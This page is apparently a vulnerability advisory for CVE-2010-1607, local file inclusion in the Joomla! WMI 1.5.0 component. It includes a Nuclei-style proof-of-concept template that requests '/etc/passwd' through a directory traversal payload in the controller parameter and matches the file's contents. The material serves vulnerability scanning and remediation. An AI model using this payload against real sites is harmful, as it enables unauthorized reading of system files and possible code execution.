CVE-2010-1607: Joomla! Component WMI 1.5.0 - Local File Inclusion

2025-08-01 Joomla! Component WMI 1.5.0 PoC Public

Description

A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.

PoC

id: CVE-2010-1607

info:
  name: Joomla! Component WMI 1.5.0 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
  remediation: |
    Update Joomla! Component WMI to the latest version or apply the provided patch to fix the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12316
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1607
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/58032
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-1607
    cwe-id: CWE-22
    epss-score: 0.08177
    epss-percentile: 0.94572
    cpe: cpe:2.3:a:paysyspro:com_wmi:1.5.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: paysyspro
    product: com_wmi
  tags: cve,cve2010,joomla,lfi,edb,paysyspro,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d4d9b5d435d09e9d3d4b93d52a45666c66bc902f56b984df4ae11c21f9ba81f9022100c16455dcc0174a35852f8727f92b7851ce8c6cc30d8228295acba318a6e847ab:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities